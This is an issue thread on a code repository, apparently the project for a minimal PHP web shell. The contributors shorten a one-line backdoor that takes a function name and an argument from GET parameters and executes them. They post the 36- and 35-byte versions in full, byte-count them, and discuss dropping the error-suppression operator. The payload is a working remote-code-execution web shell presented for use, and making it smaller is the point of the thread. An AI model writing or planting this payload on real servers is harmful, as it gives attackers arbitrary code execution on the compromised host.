### ISSUE TITLE
reduce 1 character

### ISSUE THREAD

**Issue by d4em0n** [s0md3v/nano#5]
`<?$x=$_GET;@$x[p]==_&&$x[f]($x[c]); `

**Comment by d4em0n** [comment]
Hi!, your current payload length is 36 bytes not 37 bytes like in readme.
```
>>> len("<?$x=$_GET;$x[p]=='_'&&$x[f]($x[c]);")
36
```
my payload is 35 bytes (reduce 1 character);
```
>>> len("<?$x=$_GET;@$x[p]==_&&$x[f]($x[c]);")
35
```

**Comment by s0md3v** [comment]
It was originally 37 bytes but a guy shortened it yesterday and I forgot to change the byte size :smiley: 
But I am really amazed that you managed to shorten it further.
Btw why do we need that `@`? It is used to suppress errors right?
I guess we should remove it as well.

**Comment by d4em0n** [comment]
Yeah, it's used to remove error messages (`PHP Notice:  Use of undefined constant...`). you can still do it without `@`

**Comment by s0md3v** [comment]
I am removing the `@` then.
Thanks a lot bruh, that was really smart and I didn't knew that we can declare strings like that. 
Thanks again ^_^
